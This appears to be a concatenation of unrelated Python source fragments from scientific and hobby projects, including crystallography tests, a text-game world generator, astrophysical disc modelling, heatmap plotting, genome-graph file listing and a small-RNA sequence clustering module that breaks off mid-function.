if(centrics.indices().size() > 0):
ideal = centrics.phase_transfer(centrics)
assert flex.max(flex.abs(ideal.data() - centrics.data())) < 1.e-6
###
#print "max = ", flex.max( flex.abs( f_water_dist.data() ) )
#print "min = ", flex.min( flex.abs( f_water_dist.data() ) )
#print "ave = ", flex.mean( flex.abs( f_water_dist.data() ) )
assert flex.max( flex.abs( f_water_dist.data() ) ) < 1.0
#------------------------------------------------------------------------
def run_call_back(flags, space_group_info):
test_less_one(space_group_info = space_group_info)
def run_call_back_1(flags, space_group_info):
test_r(space_group_info = space_group_info)
def run():
debug_utils.parse_options_loop_space_groups(sys.argv[1:], run_call_back_1,
symbols_to_stdout=True, symbols_to_stderr=False)
debug_utils.parse_options_loop_space_groups(sys.argv[1:], run_call_back,
symbols_to_stdout=True, symbols_to_stderr=False)
test_grid_step()
print("OK")
if (__name__ == "__main__"):
run()
|
11547902
|
import networkx as nx
from networkx.drawing import nx_pydot
from graph2world.generator import Generator
# from pycorenlp import StanfordCoreNLP
def get_dummy_graph():
"""
Generate a dummy graph for testing
Returns:
Graph: a simple test graph
"""
g = nx.DiGraph()
g.add_nodes_from(['kitchen', 'spoon', 'living room'])
g.add_edge('spoon', 'kitchen', type='in')
g.add_edge('kitchen', 'living room', type='connected')
g.add_edge('living room', 'kitchen', type='connected')
g.nodes['kitchen']['type'] = 'room'
g.nodes['living room']['type'] = 'room'
g.nodes['spoon']['type'] = 'object'
return g
def get_gml_graph(location):
"""
Load networkx graph from gml file
Parameters:
location (str): file path as string to *.gml
Returns:
Graph: loaded object in networkx format
"""
# nlp = StanfordCoreNLP('http://localhost:9000')
#
# text = "thousands of images of Napoleon all over London"
#
# output = nlp.annotate(text, properties={
# 'annotators': 'parse',
# 'outputFormat': 'json'
# })
#
# print(output['sentences'][0]['parse'])
#
# dependencies = output['sentences'][0]['basicDependencies']
# subjects = [x for x in dependencies if x['dep'] == 'nsubj']
# if len(subjects) >= 1:
# print(subjects[0]['governorGloss'])
# else:
# roots = [x for x in dependencies if x['dep'] == 'ROOT']
# if len(roots) >= 1:
# print(roots[0]['dependentGloss'])
# else:
# print('no head found!')
#
try:
# g = nx.read_gml(location).to_directed()
g = nx_pydot.read_dot(location).to_undirected()
# before returning graph, run
# some clean-up pre-processing
temp = sorted(g)
mapping = {}
for node in temp:
node_name = node
# escape commas, similar to csv
if ',' in node_name:
node_name = '"' + node_name + '"'
# remove period at end of name
if node_name[-1] == '.':
node_name = node_name[:-1]
# capitalize first letter in name
if not node_name[0].isupper():
if len(node_name) == 1:
node_name = node_name.upper()
else:
node_name = node_name[0].upper() + node_name[1:]
mapping[node] = node_name
g = nx.relabel_nodes(g, mapping)
# # remove double quotes if exist from flavor text
# for u, v, data in g.edges(data=True):
# for i in g[u][v]:
# if 'flavortext' in g[u][v][i]:
# if g[u][v][i]['flavortext'][0] == '"':
# g[u][v][i]['flavortext'] = g[u][v][i]['flavortext'][1:]
# # if g[u][v]['flavortext'][0] == '"':
# # print('caught')
# also need to make edges bidirectional
# new_edges = []
# for u, v, data in g.edges(data=True):
# # if data['type'] == 'connected':
# # new_edges.append((v, u))
# if 'flavortext' in data:
# new_edges.append((v, u, data['type'], data['flavortext']))
# else:
# new_edges.append((v, u, data['type'], ''))
# for new_edge in new_edges:
# g.add_edge(new_edge[0], new_edge[1], type=new_edge[2], flavortext=new_edge[3])
return g
except:
raise Exception('Could not open file!')
def graph_to_world(graph, zone, output_location=None):
"""
Primary function, take a networkx graph and save generated Evennia code to location
Parameters:
graph (Graph): networkx object
output_location (str): file path as string to save *.ev
"""
gen = Generator()
gen.load_graph(graph, zone)
if output_location is None:
gen.to_file()
else:
gen.to_file(output_location)
|
11547921
|
import astropy.io.fits as fits
import matplotlib.pyplot as plt
import matplotlib.tri as tri
import numpy as np
import os
from .parameters import Params, find_parameter_file
from .run import run
class Disc:
def __init__(self, dir=None, **kwargs):
# Correct path if needed
dir = os.path.normpath(os.path.expanduser(dir))
if dir[-9:] != "data_disk":
dir = os.path.join(dir, "data_disk")
self.dir = dir
# Search for parameter file
para_file = find_parameter_file(dir)
# Read parameter file
self.P = Params(para_file)
# Read model results
self._read(**kwargs)
def _read(self):
# Read grid file
try:
hdu = fits.open(self.dir + "/grid.fits.gz")
self.grid = hdu[0].data
hdu.close()
except OSError:
print('cannot open grid.fits.gz')
# Read gas density file
try:
hdu = fits.open(self.dir + "/gas_density.fits.gz")
self.gas_density = hdu[0].data
hdu.close()
except OSError:
print('cannot open gas_density.fits.gz')
# Read volume file
try:
hdu = fits.open(self.dir + "/volume.fits.gz")
self.volume = hdu[0].data
hdu.close()
except OSError:
print('cannot open volume.fits.gz')
def r(self):
if self.grid.ndim > 2:
return self.grid[0, :, :, :]
else:
return np.sqrt(self.grid[0, :] ** 2 + self.grid[1, :] ** 2)
def z(self):
if self.grid.ndim > 2:
return self.grid[1, :, :, :]
else:
return self.grid[2, :]
def add_spiral(
self, a=30, sigma=10, f=1, theta0=0, rmin=None, rmax=None, n_az=None
):
""" Add a geometrucal spiral on a 2D (or 3D) mcfost density grid
and return a 3D array which can be directly written as a fits
file for mcfost to read
geometrical spiral r = a (theta - theta0)
surface density is mutiply by f at the crest of the spiral
the spiral has a Gaussin profil in (x,y) with sigma given in au
"""
if self.grid.ndim <= 2:
ValueError("Can only add a spiral on a cylindrical or spherical grid")
if n_az is None:
n_az = self.grid.shape[1]
phi = np.linspace(0, 2 * np.pi, n_az, endpoint=False)
r = self.grid[0, 0, 0, :]
if rmin is None:
rmin = r.min()
if rmax is None:
rmax = r.max()
x = r[np.newaxis, :] * np.cos(phi[:, np.newaxis])
y = r[np.newaxis, :] * np.sin(phi[:, np.newaxis])
# Just to test
# x = np.linspace(-100,100,500)
# x, y = np.meshgrid(x,x)
# r = np.sqrt(x**2 + y**2) # we recalcule in preparation for other types of grid
# rc=50, hc=0.15, alpha=1.5, beta=0.25
# theta_c = 0.
# theta = theta_c + np.sign(r - rc)/hc * \
# ((r/rc)**(1+beta) * (1/(1+beta) - 1/(1-alpha + beta) * (r/rc)**(-alpha)) \
# - 1/(1+beta) - 1/(1-alpha + beta))
r_spiral = np.geomspace(rmin, rmax, num=5000)
theta = r_spiral / a + theta0
x_spiral = r_spiral * np.cos(theta)
y_spiral = r_spiral * np.sin(theta)
correct = np.ones(x.shape)
# This is really badly implemented, but fast enough that we don't care
sigma2 = sigma ** 2
for i in range(x.shape[0]):
for j in range(x.shape[1]):
d2 = np.min((x_spiral - x[i, j]) ** 2 + (y_spiral - y[i, j]) ** 2)
correct[i, j] += f * np.exp(-0.5 * d2 / sigma2)
triang = tri.Triangulation(x.flatten(), y.flatten())
plt.tripcolor(triang, correct.flatten(), shading='flat')
return self.gas_density[np.newaxis, :, :] * correct[:, np.newaxis, :]
def check_grid(model):
"""
We check if the disc structure already exists
if not, we check if it exists
if not, we try to compute it
"""
try:
grid = model.disc.grid
except:
try:
print("Trying to read grid structure ...")
model.disc = Disc(model.basedir)
grid = model.disc.grid
except:
print("No grid structure, trying to create it ...")
run(model.P.filename, options=model.P.options+" -disk_struct")
try:
print("Trying to read grid structure again ...")
model.disc = Disc(model.basedir)
grid = model.disc.grid
except AttributeError:
print("Cannot read grid in " + model.basedir)
return grid
def _plot_cutz(model, y, r=None, dr=None, log=None, **kwargs):
grid = check_grid(model)
if grid.ndim > 2:
r_mcfost = grid[0, 0, 0, :]
i = np.argmin(np.abs(r_mcfost - r))
print("selected_radius =", r_mcfost[i])
z_mcfost = grid[1, 0, :, i]
y = y[:,i]
if log:
plt.loglog(z_mcfost, y, **kwargs)
else:
plt.plot(z_mcfost, y, **kwargs)
else:
r_mcfost = np.sqrt(grid[0, :] ** 2 + grid[1, :] ** 2)
ou = r_mcfost > 1e-6 # Removing star
y = y[ou]
r_mcfost = r_mcfost[ou]
z_mcfost = grid[2, ou]
# Selecting data points
ou = (r_mcfost > r - dr) & (r_mcfost < r + dr)
z_mcfost = z_mcfost[ou]
y = y[ou]
#plt.plot(z_mcfost, T, "o", **kwargs)
fig = plt.gcf()
ax = fig.add_subplot(1, 1, 1, projection='scatter_density')
density = ax.scatter_density(z_mcfost,y, **kwargs)
plt.xlabel("z [au]")
|
11547978
|
import numpy as np
import pdb
import matplotlib as plt
plt.use('AGG')
import pylab as py
import matplotlib.cm
from matplotlib.cm import ScalarMappable
import skimage.io
import skimage.filter
from skimage import feature
def normit(x):
x = (x-np.min(x))/(np.max(x)-np.min(x))
return x
def PLOT(mfi,savepath):
'''
:param mfi: feature importance map of the digit
:param savepath: path to result heatmap picture
:return: -
'''
py.imshow(np.reshape(mfi, (16, 16)))
py.savefig(savepath)
def PLOTnum(mfi, savepath, digit,prediction=1):
'''
:param mfi: feature importance map of the digit
:param savepath: path to result heatmap picture
:param digit: has to be in the final plotting shape (e.g. 16 x 16 for usps data)
:return: -
'''
py.close("all")
cmp = plt.cm.get_cmap('Greys')
cmp._init()
fig = py.imshow(normit(digit), cmap=cmp, origin='lower')#, vmin=0.4, vmax=0.7)
fig.axes.get_xaxis().set_visible(False)
fig.axes.get_yaxis().set_visible(False)
cmap_used = py.get_cmap()
cmap_used._init()
cmap_used._init()
py.imshow(np.reshape(normit(mfi), digit.shape))
alphas = np.linspace(0.2, 0.9, cmap_used.N + 3)
cmap_used._lut[40:190, 0:3] = [1, 1, 1]
#
cmap_used._lut[40:190, -1] = 0.4#alphas[30:180] #
py.tight_layout()
py.colorbar()
py.title(str(prediction))
py.savefig(savepath, bbox_inches=0, orientation='landscape', pad_inches=0.1)
def PLOTnum3(mfis, savepath, digits,prediction=None):
'''
:param mfi: feature importance map of the digit
:param savepath: path to result heatmap picture
:param digit: has to be in the final plotting shape (e.g. 16 x 16 for usps data)
:return: -
'''
py.close("all")
cmp = plt.cm.get_cmap('Greys')
cmp._init()
for i,mfi in enumerate(mfis):
py.subplot(2, len(mfis), i + 1)
fig = py.imshow(vec2im(digits[i]),cmap = cmp)
fig.axes.get_xaxis().set_visible(False)
fig.axes.get_yaxis().set_visible(False)
for i,mfi in enumerate(mfis):
rgb = hm_to_rgb(mfi, X=digits[i])
py.subplot(2, len(mfis), len(mfis) + 1 + i)
fig = py.imshow(rgb,interpolation='spline16')
fig.axes.get_xaxis().set_visible(False)
fig.axes.get_yaxis().set_visible(False)
if prediction != None:
py.title(str(np.round(prediction[i],2)))
py.savefig(savepath, bbox_inches=0, orientation='landscape', pad_inches=0.1)
def vec2im(V, shape = () ):
# function taken from https://github.com/sebastian-lapuschkin/lrp_toolbox/blob/master/python/render.py
'''
Transform an array V into a specified shape - or if no shape is given assume a square output format.
Parameters
----------
V : numpy.ndarray
an array either representing a matrix or vector to be reshaped into an two-dimensional image
shape : tuple or list
optional. containing the shape information for the output array if not given, the output is assumed to be square
Returns
-------
W : numpy.ndarray
with W.shape = shape or W.shape = [np.sqrt(V.size)]*2
'''
if len(shape) < 2:
shape = [np.sqrt(V.size)]*2
return np.reshape(V, shape)
def enlarge_image(img, scaling = 3):
# function taken from https://github.com/sebastian-lapuschkin/lrp_toolbox/blob/master/python/render.py
'''
Enlarges a given input matrix by replicating each pixel value scaling times in horizontal and vertical direction.
Parameters
----------
img : numpy.ndarray
array of shape [H x W] OR [H x W x D]
scaling : int
positive integer value > 0
Returns
-------
out : numpy.ndarray
two-dimensional array of shape [scaling*H x scaling*W]
OR
three-dimensional array of shape [scaling*H x scaling*W x D]
depending on the dimensionality of the input
'''
if scaling < 1 or not isinstance(scaling,int):
print 'scaling factor needs to be an int >= 1'
if len(img.shape) == 2:
H,W = img.shape
out = np.zeros((scaling*H, scaling*W))
for h in range(H):
fh = scaling*h
for w in range(W):
fw = scaling*w
out[fh:fh+scaling, fw:fw+scaling] = img[h,w]
elif len(img.shape) == 3:
H,W,D = img.shape
out = np.zeros((scaling*H, scaling*W,D))
for h in range(H):
fh = scaling*h
for w in range(W):
fw = scaling*w
out[fh:fh+scaling, fw:fw+scaling,:] = img[h,w,:]
return out
def hm_to_rgb(R, X = None, scaling = 3, shape = (), sigma = 2, cmap = 'jet', normalize = True):
# function taken from https://github.com/sebastian-lapuschkin/lrp_toolbox/blob/master/python/render.py
'''
Takes as input an intensity array and produces a rgb image for the represented heatmap.
optionally draws the outline of another input on top of it.
Parameters
----------
R : numpy.ndarray
the heatmap to be visualized, shaped [M x N]
X : numpy.ndarray
optional. some input, usually the data point for which the heatmap R is for, which shall serve
as a template for a black outline to be drawn on top of the image
shaped [M x N]
scaling: int
factor, on how to enlarge the heatmap (to control resolution and as a inverse way to control outline thickness)
after reshaping it using shape.
shape: tuple or list, length = 2
optional. if not given, X is reshaped to be square.
sigma : double
optional. sigma-parameter for the canny algorithm used for edge detection. the found edges are drawn as outlines.
cmap : str
optional. color map of choice
normalize : bool
optional. whether to normalize the heatmap to [-1 1] prior to colorization or not.
Returns
-------
rgbimg : numpy.ndarray
three-dimensional array of shape [scaling*H x scaling*W x 3] , where H*W == M*N
'''
X = normit(X)# (X + 1.) / 2.
#create color map object from name string
cmap = eval('matplotlib.cm.{}'.format(cmap))
R = normit(R)
R = enlarge_image(vec2im(R,shape), scaling)
rgb = cmap(R.flatten())[...,0:3].reshape([R.shape[0],R.shape[1],3])
#rgb = repaint_corner_pixels(rgb, scaling) #obsolete due to directly calling the color map with [0,1]-normalized inputs
if not X is None: #compute the outline of the input
X = enlarge_image(vec2im(X,shape), scaling)
xdims = X.shape
Rdims = R.shape
if not np.all(xdims == Rdims):
print 'transformed heatmap and data dimension mismatch. data dimensions differ?'
print 'R.shape = ',Rdims, 'X.shape = ', xdims
print 'skipping drawing of outline\n'
else:
edges = feature.canny(X, sigma=2.)
edges = np.invert(np.dstack([edges]*3))*1.0
rgb *= edges # set outline pixels to black color
return rgb
def PFplot(values,names):
py.cla()
fs = 34
py.close("all")
val_means = []
val_std = []
for r in range(len(names)):
val_means.append(np.mean(values[r:len(names):len(values)],0))
val_std.append(np.std(values[r:len(names):len(values)],0))
for i,val in enumerate(val_means):
py.plot(val_means[i], linewidth=5.0, alpha=0.6, label=names[i])
py.xlabel("Flipping pixels", fontsize=fs)
py.ylabel("Score", fontsize=fs)
py.xticks(range(50, len(val_means[0]), 100), fontsize=fs)
py.yticks(fontsize=fs)
py.legend(loc='best',fontsize=20, fancybox=True, framealpha=0.7)
py.tight_layout()
py.savefig("results/pf.pdf")
def PF():
values=[]
for r in range(200):
for s, samples in enumerate(Samplesets):
for i in range(len(metric)):
fobj = open("results/mfi_sample_" + str(s) + ".pkl", 'rb')
mfi = pickle.load(fobj)
fobj.close()
values.append(tools.pixel_flipping(clf,np.mean(x,axis=0),mfi,100))
values.append(tools.pixel_flipping(clf, np.mean(x, axis=0), np.random.uniform(0, 1, len(mfi)), 100))
names = ["random samples","training samples","random mfi"]
fobj = open("results/pf.pkl","wb")
pickle.dump([values,names],fobj)
fobj.close()
|
11547994
|
import os
import yaml
def catlas_build(conf_file):
"Produce the list of files output by 'spacegraphcats <config> build"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
catlas_base = jj["catlas_base"]
ksize = jj["ksize"]
radius = jj["radius"]
cdbg_dir = f"{catlas_base}_k{ksize}"
catlas_dir = f"{catlas_base}_k{ksize}_r{radius}"
z = []
z.append(os.path.join(cdbg_dir, "bcalm.unitigs.db")),
z.append(os.path.join(cdbg_dir, "cdbg.gxt"))
z.append(os.path.join(cdbg_dir, "contigs.indices"))
z.append(os.path.join(cdbg_dir, "contigs.sizes"))
z.append(os.path.join(cdbg_dir, "contigs.info.csv"))
z.append(os.path.join(cdbg_dir, "contigs.mphf"))
z.append(os.path.join(catlas_dir, "catlas.csv"))
z.append(os.path.join(catlas_dir, "first_doms.txt"))
return z
def catlas_search(conf_file, cdbg_only=False, suffix=""):
"Produce the list of files output by 'spacegraphcats <config> search"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
catlas_base = jj["catlas_base"]
ksize = jj["ksize"]
radius = jj["radius"]
cdbg_str = ""
if cdbg_only:
cdbg_str = "_cdbg"
dirname = "{}_k{}_r{}{}_search_oh0{}".format(
catlas_base, ksize, radius, cdbg_str, suffix
)
filenames = jj["search"]
z = []
for x in filenames:
x = os.path.basename(x)
z.append(os.path.join(dirname, "{}.cdbg_ids.txt.gz".format(x)))
z.append(os.path.join(dirname, "{}.contigs.sig".format(x)))
z.append(os.path.join(dirname, "{}.frontier.txt.gz".format(x)))
z.append(os.path.join(dirname, "{}.response.txt".format(x)))
z.append(os.path.join(dirname, "results.csv"))
return z
def catlas_extract_contigs(conf_file, cdbg_only=False, suffix=""):
"Produce the list of files output by 'spacegraphcats <config> extract_contigs"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
catlas_base = jj["catlas_base"]
ksize = jj["ksize"]
radius = jj["radius"]
cdbg_str = ""
if cdbg_only:
cdbg_str = "_cdbg"
dirname = "{}_k{}_r{}{}_search_oh0{}".format(
catlas_base, ksize, radius, cdbg_str, suffix
)
filenames = jj["search"]
z = []
for x in filenames:
x = os.path.basename(x)
z.append(os.path.join(dirname, "{}.cdbg_ids.contigs.fa.gz".format(x)))
return z
def catlas_extract_reads(conf_file, cdbg_only=False, suffix=""):
"Produce the list of files output by 'spacegraphcats <config> extract_reads"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
catlas_base = jj["catlas_base"]
ksize = jj["ksize"]
radius = jj["radius"]
cdbg_str = ""
if cdbg_only:
cdbg_str = "_cdbg"
dirname = "{}_k{}_r{}{}_search_oh0{}".format(
catlas_base, ksize, radius, cdbg_str, suffix
)
filenames = jj["search"]
z = []
for x in filenames:
x = os.path.basename(x)
z.append(os.path.join(dirname, "{}.cdbg_ids.reads.gz".format(x)))
return z
def catlas_search_input(conf_file):
"Produce the list of files required by 'spacegraphcats <config> search"
with open(conf_file, "rt") as fp:
jj = yaml.safe_load(fp)
filenames = jj["search"]
return filenames
|
11548007
|
from __future__ import print_function
import os
import sys
import os.path as op
from collections import Counter, namedtuple
import pickle
import json
import numpy as np
import pandas as pd
import pybedtools
from seqcluster.libs.utils import file_exists
import seqcluster.libs.logger as mylog
from seqcluster.libs import do
from seqcluster.libs.read import load_data
from seqcluster.libs.mystats import up_threshold
from seqcluster.detect.cluster import detect_clusters, clean_bam_file, peak_calling, detect_complexity
from seqcluster.detect.description import best_precursor
from seqcluster.libs.annotation import anncluster
from seqcluster.libs.inputs import parse_ma_file
from seqcluster.detect.metacluster import reduceloci, _get_seqs
from seqcluster.libs.tool import generate_position_bed
from seqcluster.libs.classes import *
import seqcluster.libs.parameters as param
from seqcluster.db import make_database
logger = mylog.getLogger(__name__)
def cluster(args):
"""
Creating clusters
"""
args = _check_args(args)
read_stats_file = op.join(args.dir_out, "read_stats.tsv")
if file_exists(read_stats_file):
os.remove(read_stats_file)
bam_file, seq_obj = _clean_alignment(args)
logger.info("Parsing matrix file")
seqL, y, l = parse_ma_file(seq_obj, args.ffile)
# y, l = _total_counts(seqL.keys(), seqL)
logger.info("counts after: %s" % sum(y.values()))
logger.info("# sequences after: %s" % l)
dt = pd.DataFrame({'sample': y.keys(), 'counts': y.values()})
dt['step'] = 'aligned'
dt.to_csv(read_stats_file, sep="\t", index=False, header=False, mode='a')
if len(seqL.keys()) < 10:
logger.error("It seems you have low coverage. Please check your fastq files have enough sequences.")
raise ValueError("So few sequences.")
logger.info("Cleaning bam file")
y, l = _total_counts(list(seqL.keys()), seqL)
logger.info("counts after: %s" % sum(y.values()))
logger.info("# sequences after: %s" % l)
dt = pd.DataFrame({'sample': y.keys(), 'counts': y.values()})
dt['step'] = 'cleaned'
dt.to_csv(read_stats_file, sep="\t", index=False, header=False, mode='a')
clusL = _create_clusters(seqL, bam_file, args)
y, l = _total_counts(list(clusL.seq.keys()), clusL.seq, aligned=True)
logger.info("counts after: %s" % sum(y.values()))
logger.info("# sequences after: %s" % l)
dt = pd.DataFrame({'sample': y.keys(), 'counts': y.values()})
dt['step'] = 'clusters'
dt.to_csv(read_stats_file, sep="\t", index=False, header=False, mode='a')
logger.info("Solving multi-mapping events in the network of clusters")
clusLred = _cleaning(clusL, args.dir_out)
y, l = _total_counts(clusLred.clus, seqL)
logger.info("counts after: %s" % sum(y.values()))
logger.info("# sequences after: %s" % l)
dt = pd.DataFrame({'sample': y.keys(), 'counts': y.values()})
dt['step'] = 'meta-cluster'
dt.to_csv(read_stats_file, sep="\t", index=False, header=False, mode='a')
logger.info("Clusters up to %s" % (len(clusLred.clus.keys())))
if args.show:
logger.info("Creating sequences alignment to precursor")
clusLred = show_seq(clusLred, args.index)
clusLred = peak_calling(clusLred)
clusLred = _annotate(args, clusLred)
logger.info("Creating json and count matrix")
json_file = _create_json(clusLred, args)
logger.info("Output file in: %s" % args.dir_out)
if args.db:
name = args.db + ".db"
logger.info("Create database: database/" + name)
data = load_data(json_file)
out_dir = op.join(args.dir_out, "database")
make_database(data, name, out_dir)
logger.info("Finished")
def _check_args(args):
"""
check arguments before starting analysis.
"""
logger.info("Checking parameters and files")
args.dir_out = args.out
args.samplename = "pro"
global decision_cluster
global similar
if not os.path.isdir(args.out):
logger.warning("the output folder doens't exists")
os.mkdir(args.out)
if args.bed and args.gtf:
logger.error("cannot provide -b and -g at the same time")
raise SyntaxError
if args.debug:
logger.info("DEBUG messages will be showed in file.")
if args.bed:
args.list_files = args.bed
args.type_ann = "bed"
if args.gtf:
args.list_files = args.gtf
args.type_ann = "gtf"
logger.info("Output dir will be: %s" % args.dir_out)
if not all([file_exists(args.ffile), file_exists(args.afile)]):
logger.error("I/O error: Seqs.ma or Seqs.bam. ")
raise IOError("Seqs.ma or/and Seqs.bam doesn't exists.")
if hasattr(args, 'list_files'):
beds = args.list_files.split(",")
for filebed in beds:
if not file_exists(filebed):
logger.error("I/O error: {0}".format(filebed))
raise IOError("%s annotation files doesn't exist" % filebed)
param.decision_cluster = args.method
if args.similar:
param.similar = float(args.similar)
if args.min_seqs:
param.min_seqs = int(args.min_seqs)
return args
def _total_counts(seqs, seqL, aligned=False):
"""
Counts total seqs after each step
"""
total = Counter()
nseqs = 0
if isinstance(seqs, list):
if not aligned:
nseqs = len([total.update(seqL[s].freq) for s in seqs])
else:
nseqs = len([total.update(seqL[s].freq) for s in seqs if seqL[s].align > 0])
elif isinstance(seqs, dict):
[total.update(seqs[s].get_freq(seqL)) for s in seqs]
nseqs = sum(len(seqs[s].idmembers) for s in seqs)
return total, nseqs
def _write_size_table(data_freq, data_len, ann_valid, cluster_id):
dd = Counter()
for f, l in zip(data_freq, data_len):
dd[l] += np.mean(list(f.values()))
table = ""
for l in sorted(dd):
table += "%s\t%s\t%s\t%s\n" % (l, dd[l], ann_valid, cluster_id)
return table
def _get_annotation(c, loci):
"""get annotation of transcriptional units"""
data_ann_temp = {}
data_ann = []
counts = Counter()
for lid in c.loci2seq:
# original Py 2.7 code
#for dbi in loci[lid].db_ann.keys():
# data_ann_temp[dbi] = {dbi: map(lambda (x): loci[lid].db_ann[dbi].ann[x].name, loci[lid].db_ann[dbi].ann.keys())}
# suggestion by 2to3
for dbi in list(loci[lid].db_ann.keys()):
data_ann_temp[dbi] = {dbi: [loci[lid].db_ann[dbi].ann[x].name for x in list(loci[lid].db_ann[dbi].ann.keys())]}
logger.debug("_json_: data_ann_temp %s %s" % (dbi, data_ann_temp[dbi]))
counts[dbi] += 1
# original Py 2.7 code
#data_ann = data_ann + map(lambda (x): data_ann_temp[x], data_ann_temp.keys())
# suggestion by 2to3
data_ann = data_ann + [data_ann_temp[x] for x in list(data_ann_temp.keys())]
logger.debug("_json_: data_ann %s" % data_ann)
counts = {k: v for k, v in iter(counts.items())}
total_loci = sum([counts[db] for db in counts])
valid_ann = [k for k, v in iter(counts.items()) if up_threshold(v, total_loci, 0.7)]
return data_ann, valid_ann
def _get_counts(list_seqs, seqs_obj, factor):
scaled = {}
seq = namedtuple('seq', 'freq norm_freq')
for s in list_seqs:
if s not in factor:
factor[s] = 1
samples = seqs_obj[s].norm_freq.keys()
corrected_norm = np.array(list(seqs_obj[s].norm_freq.values())) * factor[s]
corrected_raw = np.array(list(seqs_obj[s].freq.values())) * factor[s]
scaled[s] = seq(dict(zip(samples, corrected_raw)), dict(zip(samples, corrected_norm)))
return scaled
def _sum_by_samples(seqs_freq, samples_order):
"""
Sum sequences of a metacluster by samples.
"""
n = len(seqs_freq[list(seqs_freq.keys())[0]].freq.keys())
y = np.array([0] * n)
for s in seqs_freq:
x = seqs_freq[s].freq
exp = [seqs_freq[s].freq[sam] for sam in samples_order]
y = list(np.array(exp) + y)
return y
def _annotate(args, setclus):
"""annotate transcriptional units with
gtf/bed files provided by -b/g option"""
logger.info("Creating bed file")
bedfile = generate_position_bed(setclus)
a = pybedtools.BedTool(bedfile, from_string=True)
beds = []
logger.info("Annotating clusters")
if hasattr(args, 'list_files'):
beds = args.list_files.split(",")
for filebed in beds:
logger.info("Using %s " % filebed)
db = os.path.basename(filebed)
b = pybedtools.BedTool(filebed)
c = a.intersect(b, wo=True)
setclus = anncluster(c, setclus, db, args.type_ann, args.feature_id)
return setclus
def _clean_alignment(args):
"""
Prepare alignment for cluster detection.
"""
logger.info("Clean bam file with highly repetitive reads with low counts. sum(counts)/n_hits > 1%")
bam_file, seq_obj = clean_bam_file(args.afile, args.mask)
logger.info("Using %s file" % bam_file)
detect_complexity(bam_file, args.ref, args.out)
return bam_file, seq_obj
def _create_clusters(seqL, bam_file, args):
"""
Cluster sequences and
create metaclusters with multi-mappers.
"""
clus_obj = []
cluster_file = op.join(args.out, "cluster.bed")
if not os.path.exists(op.join(args.out, 'list_obj.pk')):
if not file_exists(cluster_file):
logger.info("Parsing aligned file")
logger.info("Merging sequences")
bedtools = os.path.join(os.path.dirname(sys.executable), "bedtools")
bedtools = bedtools if os.path.exists(bedtools) else "bedtools"
parse_cmd = "awk '{i=i+1;print $1\"\\t\"$2\"\\t\"$3\"\\t\"$4\"\\t\"i\"\\t\"$6}'"
cmd = "{bedtools} bamtobed -i {bam_file} | {parse_cmd} | {bedtools} cluster -s -d 20 -i - > {cluster_file}"
do.run(cmd.format(**locals()))
c = pybedtools.BedTool(cluster_file)
logger.info("Creating clusters")
clus_obj = detect_clusters(c, seqL, args.min_seqs, args.non_un_gl)
with open(op.join(args.out, 'list_obj.pk'), 'wb') as output:
pickle.dump(clus_obj, output, pickle.HIGHEST_PROTOCOL)
else:
logger.info("Loading previous clusters")
with open(op.join(args.out, 'list_obj.pk'), 'rb') as input:
clus_obj = pickle.load(input)
# bedfile = pybedtools.BedTool(generate_position_bed(clus_obj), from_string=True)
# seqs_2_loci = bedfile.intersect(pybedtools.BedTool(aligned_bed, from_string=True), wo=True, s=True)
# seqs_2_position = add_seqs_position_to_loci(seqs_2_loci, seqL)
logger.info("%s clusters found" % (len(clus_obj.clusid)))
return clus_obj
def _cleaning(clusL, path):
"""
Load saved cluster and jump to next step
"""
backup = op.join(path, "list_obj_red.pk")
if not op.exists(backup):
clus_obj = reduceloci(clusL, path)
with open(backup, 'wb') as output:
pickle.dump(clus_obj, output, pickle.HIGHEST_PROTOCOL)
return clus_obj
else:
logger.info("Loading previous reduced clusters")
with open(backup, 'rb') as in_handle:
clus_obj = pickle.load(in_handle)
return clus_obj
def _create_json(clusL, args):
clus = clusL.clus
seqs = clusL.seq
loci = clusL.loci
data_clus = {}
out_count = os.path.join(args.dir_out, "counts.tsv")
out_single_count = os.path.join(args.dir_out, "counts_sequence.tsv")
out_size = os.path.join(args.dir_out, "size_counts.tsv")
out_bed = os.path.join(args.dir_out, "positions.bed")
samples_order = list(seqs[list(seqs.keys())[1]].freq.keys())
with open(out_count, 'w') as matrix, open(out_size, 'w') as size_matrix, open(out_bed, 'w') as out_bed, open(out_single_count, 'w') as matrix_single:
matrix.write("id\tnloci\tann\t%s\n" % "\t".join(samples_order))
matrix_single.write("id\tann\tsequence\t%s\n" % "\t".join(samples_order))
for cid in clus:
seqList = []
c = clus[cid]
seqList = _get_seqs(c)
logger.debug("_json_: %s" % seqList)
data_ann, valid_ann = _get_annotation(c, loci)
data_loci = best_precursor(c, loci)
idloci, chrom, s, e, st, size = data_loci[0]
annotation = valid_ann[0] if valid_ann else "none"
bed_line = "%s\t%s\t%s\t%s\t%s\t%s\t%s\n" % (chrom, s, e, annotation, cid, st, len(seqList))
out_bed.write(bed_line)
# original Py 2.7 code
#data_seqs = map(lambda (x): {x: seqs[x].seq}, seqList)
# proposal by 2to3
data_seqs = [{x: seqs[x].seq} for x in seqList]
scaled_seqs = _get_counts(seqList, seqs, c.idmembers)
# original Py 2.7 code
#data_freq = map(lambda (x): scaled_seqs[x].freq, seqList)
#data_freq_w_id = map(lambda (x): {x: scaled_seqs[x].norm_freq}, seqList)
#data_len = map(lambda (x): seqs[x].len, seqList)
# proposal by 2to3
data_freq = [scaled_seqs[x].freq for x in seqList]
data_freq_w_id = [{x: scaled_seqs[x].norm_freq} for x in seqList]
data_len = [seqs[x].len for x in seqList]
sum_freq = _sum_by_samples(scaled_seqs, samples_order)
data_ann_str = [["%s::%s" % (name, ",".join(features)) for name, features in iter(k.items())] for k in data_ann]
data_valid_str = " ".join(valid_ann)
for s in seqList:
f = [seqs[s].freq[so] for so in samples_order]
if f.count(0) > 0.1 * len(f) and len(f) > 9:
continue
f = map(str, f)
print("\t".join([str(cid), data_valid_str, seqs[s].seq, "\t".join(f)]), file=matrix_single, end="\n")
matrix.write("%s\t%s\t%s|%s\t%s\n" % (cid, c.toomany, data_valid_str, ";".join([";".join(d) for d in data_ann_str]), "\t".join(map(str, sum_freq))))
size_matrix.write(_write_size_table(data_freq, data_len, data_valid_str, cid))
data_string = {'seqs': data_seqs, 'freq': data_freq_w_id,
'loci': data_loci, 'ann': data_ann,
